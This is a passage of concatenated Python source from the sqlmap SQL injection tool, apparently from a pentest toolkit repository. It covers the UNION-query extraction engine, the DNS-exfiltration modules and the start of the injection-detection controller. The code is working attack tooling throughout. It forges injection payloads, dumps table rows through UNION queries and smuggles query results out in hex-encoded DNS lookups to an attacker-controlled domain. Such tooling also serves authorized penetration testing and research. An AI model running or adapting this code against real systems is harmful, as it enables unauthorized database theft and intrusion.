re.DOTALL | re.IGNORECASE)), \ None) # Automatically patching last char trimming cases if kb.chars.stop not in 
(page or "") and kb.chars.stop[:-1] in (page or ""): warnMsg = "automatically patching output having last char trimmed" singleTimeWarnMessage(warnMsg) page = page.replace(kb.chars.stop[:-1], kb.chars.stop) retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) else: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: warnMsg = "possible server trimmed output detected " warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) return retVal def configUnion(char=None, columns=None): def _configUnionChar(char): if not isinstance(char, basestring): return kb.uChar = char if conf.uChar is not None: kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) def _configUnionCols(columns): if not isinstance(columns, basestring): return columns = columns.replace(" ", "") if "-" in columns: colsStart, colsStop = columns.split("-") else: colsStart, colsStop = columns, columns if not colsStart.isdigit() or not colsStop.isdigit(): raise SqlmapSyntaxException("--union-cols must be a range of integers") conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) if conf.uColsStart > conf.uColsStop: errMsg = "--union-cols range has to be from lower to " errMsg += "higher number of columns" raise SqlmapSyntaxException(errMsg) _configUnionChar(char) _configUnionCols(conf.uCols or columns) def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ kb.forcePartialUnion or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): 
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. 
It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: with kb.locks.value: if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) if isListLike(items): # in case that we requested N columns and we get M!=N then we have to filter a bit if len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] items = [_ for _ in flattenValue(items)] if len(items) > len(expressionFieldsList): filtered = OrderedDict() for item in items: key = re.sub(r"[^A-Za-z0-9]", "", item).lower() if key not in filtered or re.search(r"[^A-Za-z0-9]", item): filtered[key] = item items = filtered.values() items = [items] index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) else: index = None if threadData.shared.showEta: threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
16,632
Python
.py
290
42.406897
267
0.598919
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
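The _oneShotUnionUse() function in the file above recognizes its own query output inside an arbitrary HTML page by wrapping it between unique start/stop markers (kb.chars.start, kb.chars.stop) and pulling it back out with a regex, then splitting columns on kb.chars.delimiter. A reduced illustration of that delimiting scheme, with made-up marker values in place of sqlmap's per-run random ones:

import re

CHARS_START, CHARS_STOP = ":abc123:", ":xyz789:"   # stand-ins for kb.chars.start/stop
CHARS_DELIMITER = "|"                               # stand-in for kb.chars.delimiter

def extract_union_output(page):
    """Pull marker-delimited UNION output out of a response body, the way
    _oneShotUnionUse() does with its '(?P<result>START.*STOP)' pattern."""
    match = re.search("(?P<result>%s.*%s)" % (re.escape(CHARS_START), re.escape(CHARS_STOP)),
                      page or "", re.DOTALL)
    if match is None:
        return None
    value = match.group("result")
    # strip the markers, then split the remaining payload into columns
    return value[len(CHARS_START):-len(CHARS_STOP)].split(CHARS_DELIMITER)

page = "<html><td>%sadmin%s5f4dcc3b%s</td></html>" % (CHARS_START, CHARS_DELIMITER, CHARS_STOP)
print(extract_union_output(page))   # ['admin', '5f4dcc3b']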
18,969
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/union/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,970
test.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/test.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import Backend
from lib.core.common import randomInt
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.exception import SqlmapNotVulnerableException
from lib.techniques.dns.use import dnsUse

def dnsTest(payload):
    logger.info("testing for data retrieval through DNS channel")

    randInt = randomInt()
    kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt)

    if not kb.dnsTest:
        errMsg = "data retrieval through DNS channel failed"

        if not conf.forceDns:
            conf.dnsName = None
            errMsg += ". Turning off DNS exfiltration support"
            logger.error(errMsg)
        else:
            raise SqlmapNotVulnerableException(errMsg)
    else:
        infoMsg = "data retrieval through DNS channel was successful"
        logger.info(infoMsg)
1,127
Python
.py
28
35.178571
130
0.724611
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
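dnsTest() above forges its probe as "SELECT <randInt>" plus the DBMS's dummy-table suffix, because some engines reject a bare SELECT without a FROM clause. A tiny sketch of that forging step; the dictionary here is an abridged stand-in for lib.core.dicts.FROM_DUMMY_TABLE, not its full contents:

# abridged stand-in for lib.core.dicts.FROM_DUMMY_TABLE
FROM_DUMMY_TABLE = {"Oracle": " FROM DUAL", "Firebird": " FROM RDB$DATABASE"}

def forge_probe(dbms, rand_int):
    """Build the 'SELECT <randInt>' probe used by dnsTest(), appending the
    DBMS's dummy table where a bare SELECT is not allowed."""
    return "SELECT %d%s" % (rand_int, FROM_DUMMY_TABLE.get(dbms, ""))

print(forge_probe("Oracle", 1234))  # SELECT 1234 FROM DUAL
print(forge_probe("MySQL", 1234))   # SELECT 1234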
18,971
use.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/use.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re
import time

from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request

def dnsUse(payload, expression):
    """
    Retrieve the output of a SQL query taking advantage of the DNS
    resolution mechanism by making request back to attacker's machine.
    """

    start = time.time()

    retVal = None
    count = 0
    offset = 1

    if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
        output = hashDBRetrieve(expression, checkConf=True)

        if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
            output = None

        if output is None:
            kb.dnsMode = True

            while True:
                count += 1
                prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
                chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
                _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
                nulledCastedField = agent.nullAndCastField(fieldToCastStr)
                nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
                nulledCastedField = agent.hexConvertField(nulledCastedField)
                expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
                expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName)
                expressionUnescaped = unescaper.escape(expressionRequest)

                if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
                    query = agent.prefixQuery("; %s" % expressionUnescaped)
                    query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)
                    forgedPayload = agent.payload(newValue=query)
                else:
                    forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))

                Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)

                _ = conf.dnsServer.pop(prefix, suffix)

                if _:
                    _ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
                    _ = decodeHexValue(_)
                    output = (output or "") + _
                    offset += len(_)

                    if len(_) < chunk_length:
                        break
                else:
                    break

            output = decodeHexValue(output) if conf.hexConvert else output

            kb.dnsMode = False

        if output is not None:
            retVal = output

            if kb.dnsTest is not None:
                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))

                if count > 0:
                    hashDBWrite(expression, output)

        if not kb.bruteMode:
            debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))
            logger.debug(debugMsg)

    elif conf.dnsName:
        warnMsg = "DNS data exfiltration method through SQL injection "
        warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
        singleTimeWarnMessage(warnMsg)

    return safecharencode(retVal) if kb.safeCharEncode else retVal
4,654
Python
.py
90
42.122222
170
0.667548
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
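dnsUse() above pages through the query result in MAX_DNS_LABEL-sized pieces, advancing a 1-based SUBSTRING offset until a short chunk signals the end of the value. Here is that reassembly loop in isolation; fetch_chunk is a hypothetical callback standing in for the forge-payload/DNS round-trip, and 31 is only an assumed chunk size, not the real setting:

CHUNK_LENGTH = 31   # assumed stand-in, roughly MAX_DNS_LABEL / 2

def reassemble(fetch_chunk):
    """Rebuild a value from fixed-size substring reads, stopping on the
    first short chunk -- the offset walk dnsUse() performs."""
    output, offset = "", 1          # SQL SUBSTRING offsets are 1-based
    while True:
        chunk = fetch_chunk(offset, CHUNK_LENGTH)
        output += chunk
        offset += len(chunk)
        if len(chunk) < CHUNK_LENGTH:
            break
    return output

secret = "this is a value exfiltrated one DNS label at a time"
fetch = lambda off, n: secret[off - 1:off - 1 + n]
assert reassemble(fetch) == secret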
18,972
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/techniques/dns/__init__.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,973
checks.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/controller/checks.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import httplib import re import socket import time from subprocess import Popen as execute from extra.beep.beep import beep from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend from lib.core.common import extractRegexResult from lib.core.common import extractTextTagContent from lib.core.common import findDynamicContent from lib.core.common import Format from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode from lib.core.common import intersect from lib.core.common import listToStrValue from lib.core.common import parseFilePaths from lib.core.common import popValue from lib.core.common import pushValue from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import showStaticWords from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import HEURISTIC_CHECK_ALPHABET from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import UNKNOWN_DBMS from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.inject import checkBooleanExpression from lib.request.templates import getPageTemplate from lib.techniques.union.test import unionTest from lib.techniques.union.use import configUnion def checkSqlInjection(place, parameter, value): # Store here the details about boundaries and payload used to # successfully inject injection = InjectionDict() # Localized thread data needed for some methods threadData = getCurrentThreadData() # Set the flag for SQL injection test mode kb.testMode = True tests = getSortedInjectionTests() while tests: test = tests.pop(0) try: if kb.endDetection: break if conf.dbms is None: if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: if not Backend.getIdentifiedDbms() and not kb.heuristicDbms: kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS if not 
conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS): if kb.reduceTests is None and Backend.getErrorParsedDBMSes(): msg = "heuristic (parsing) test showed that the " msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms) msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if kb.extendTests is None: _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms) msg = "do you want to include all tests for '%s' " % _ msg += "extending provided level (%d) and risk (%s) values? [Y/n]" % (conf.level, conf.risk) kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) elif kb.extendTests is None and conf.level < 5 and conf.risk < 3: msg = "do you want to include all tests for '%s' " % conf.dbms msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk) kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms]) title = test.title kb.testType = stype = test.stype clause = test.clause unionExtended = False if stype == PAYLOAD.TECHNIQUE.UNION: configUnion(test.request.char) if "[CHAR]" in title: if conf.uChar is None: continue else: title = title.replace("[CHAR]", conf.uChar) elif "[RANDNUM]" in title or "(NULL)" in title: title = title.replace("[RANDNUM]", "random number") if test.request.columns == "[COLSTART]-[COLSTOP]": if conf.uCols is None: continue else: title = title.replace("[COLSTART]", str(conf.uColsStart)) title = title.replace("[COLSTOP]", str(conf.uColsStop)) elif conf.uCols is not None: debugMsg = "skipping test '%s' because the user " % title debugMsg += "provided custom column range %s" % conf.uCols logger.debug(debugMsg) continue match = re.search(r"(\d+)-(\d+)", test.request.columns) if injection.data and match: lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: unionExtended = True test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns) title = re.sub(r"\b%d\b" % _, str(2 * _), title) test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title) # Skip test if the user's wants to test only for a specific # technique if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech: debugMsg = "skipping test '%s' because the user " % title debugMsg += "specified to test only for " debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech)) logger.debug(debugMsg) continue # Skip test if it is the same SQL injection type already # identified by another test if injection.data and stype in injection.data: debugMsg = "skipping test '%s' because " % title debugMsg += "the payload for %s has " % PAYLOAD.SQLINJECTION[stype] debugMsg += "already been identified" logger.debug(debugMsg) continue # Skip DBMS-specific test if it does not match either the # previously identified or the user's provided DBMS (either # from program switch or from parsed error message(s)) if "details" in test and "dbms" in test.details: dbms = test.details.dbms else: dbms = None # Skip tests if title is not included by the given filter if conf.testFilter: if not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, dbms)): debugMsg = 
"skipping test '%s' because " % title debugMsg += "its name/vector/dbms is not included by the given filter" logger.debug(debugMsg) continue elif not (kb.extendTests and intersect(dbms, kb.extendTests)): # Skip test if the risk is higher than the provided (or default) # value # Parse test's <risk> if test.risk > conf.risk: debugMsg = "skipping test '%s' because the risk (%d) " % (title, test.risk) debugMsg += "is higher than the provided (%d)" % conf.risk logger.debug(debugMsg) continue # Skip test if the level is higher than the provided (or default) # value # Parse test's <level> if test.level > conf.level: debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level) debugMsg += "is higher than the provided (%d)" % conf.level logger.debug(debugMsg) continue if dbms is not None: if injection.dbms is not None and not intersect(injection.dbms, dbms): debugMsg = "skipping test '%s' because " % title debugMsg += "the back-end DBMS identified is " debugMsg += "%s" % injection.dbms logger.debug(debugMsg) continue if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]): debugMsg = "skipping test '%s' because " % title debugMsg += "the provided DBMS is %s" % conf.dbms logger.debug(debugMsg) continue if kb.reduceTests and not intersect(dbms, kb.reduceTests): debugMsg = "skipping test '%s' because " % title debugMsg += "the parsed error message(s) showed " debugMsg += "that the back-end DBMS could be " debugMsg += "%s" % Format.getErrorParsedDBMSes() logger.debug(debugMsg) continue # Skip test if it does not match the same SQL injection clause # already identified by another test clauseMatch = False for clauseTest in clause: if injection.clause is not None and clauseTest in injection.clause: clauseMatch = True break if clause != [0] and injection.clause and injection.clause != [0] and not clauseMatch: debugMsg = "skipping test '%s' because the clauses " % title debugMsg += "differs from the clause already identified" logger.debug(debugMsg) continue # Skip test if the user provided custom character if conf.uChar is not None and ("random number" in title or "(NULL)" in title): debugMsg = "skipping test '%s' because the user " % title debugMsg += "provided a specific character, %s" % conf.uChar logger.debug(debugMsg) continue infoMsg = "testing '%s'" % title logger.info(infoMsg) # Force back-end DBMS according to the current # test value for proper payload unescaping Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms) # Parse test's <request> comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # Favoring non-string specific boundaries in case of digit-like parameter values if value.isdigit(): boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\''))) else: boundaries = conf.boundaries for boundary in boundaries: injectable = False # Skip boundary if the level is higher than the provided (or # default) value # Parse boundary's <level> if boundary.level > conf.level: continue # Skip boundary if it does not match against test's <clause> # Parse test's <clause> and boundary's <clause> clauseMatch = False for clauseTest in test.clause: if clauseTest in boundary.clause: clauseMatch = True break if test.clause != [0] and boundary.clause != [0] and not clauseMatch: continue # Skip 
boundary if it does not match against test's <where> # Parse test's <where> and boundary's <where> whereMatch = False for where in test.where: if where in boundary.where: whereMatch = True break if not whereMatch: continue # Parse boundary's <prefix>, <suffix> and <ptype> prefix = boundary.prefix if boundary.prefix else "" suffix = boundary.suffix if boundary.suffix else "" # Options --prefix/--suffix have a higher priority (if set by user) prefix = conf.prefix if conf.prefix is not None else prefix suffix = conf.suffix if conf.suffix is not None else suffix comment = None if conf.suffix is not None else comment ptype = boundary.ptype # If the previous injections succeeded, we know which prefix, # suffix and parameter type to use for further tests, no # need to cycle through the boundaries for the following tests condBound = (injection.prefix is not None and injection.suffix is not None) condBound &= (injection.prefix != prefix or injection.suffix != suffix) condType = injection.ptype is not None and injection.ptype != ptype if condBound or condType: continue # For each test's <where> for where in test.where: templatePayload = None vector = None # Threat the parameter original value according to the # test's <where> tag if where == PAYLOAD.WHERE.ORIGINAL or conf.prefix: origValue = value if kb.tamperFunctions: templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where) elif where == PAYLOAD.WHERE.NEGATIVE: # Use different page template than the original # one as we are changing parameters value, which # will likely result in a different content kb.data.setdefault("randomInt", str(randomInt(10))) kb.data.setdefault("randomStr", str(randomStr(10))) if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) origValue = "%s AND %s=%s" % (value, _, _ + 1) elif conf.invalidBignum: origValue = kb.data.randomInt[:6] elif conf.invalidString: origValue = kb.data.randomStr[:6] else: origValue = "-%s" % kb.data.randomInt[:4] templatePayload = agent.payload(place, parameter, value="", newValue=origValue, where=where) elif where == PAYLOAD.WHERE.REPLACE: origValue = "" kb.pageTemplate, kb.errorIsNone = getPageTemplate(templatePayload, place) # Forge request payload by prepending with boundary's # prefix and appending the boundary's suffix to the # test's ' <payload><comment> ' string boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause) boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) # Perform the test's request and check whether or not the # payload was successful # Parse test's <response> for method, check in test.response.items(): check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # In case of boolean-based blind SQL injection if method == PAYLOAD.METHOD.COMPARISON: # Generate payload used for comparison def genCmpPayload(): sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) # Forge response payload by prepending with # boundary's prefix and appending the boundary's # suffix to the test's ' <payload><comment> ' # string boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause) boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) return cmpPayload # Useful to set 
kb.matchRatio at first based on # the False response content kb.matchRatio = None kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE) Request.queryPage(genCmpPayload(), place, raise404=False) falsePage = threadData.lastComparisonPage or "" # Perform the test's True request trueResult = Request.queryPage(reqPayload, place, raise404=False) truePage = threadData.lastComparisonPage or "" if trueResult: falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) # Perform the test's False request if not falseResult: infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title) logger.info(infoMsg) injectable = True if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable: trueSet = set(extractTextTagContent(truePage)) falseSet = set(extractTextTagContent(falsePage)) candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet))) if candidates: conf.string = candidates[0] infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'")) logger.info(infoMsg) injectable = True # In case of error-based SQL injection elif method == PAYLOAD.METHOD.GREP: # Perform the test's request and grep the response # body for the test's <grep> regular expression try: page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ or extractRegexResult(check, listToStrValue( \ [headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \ if headers else None), re.DOTALL | re.IGNORECASE) \ or extractRegexResult(check, 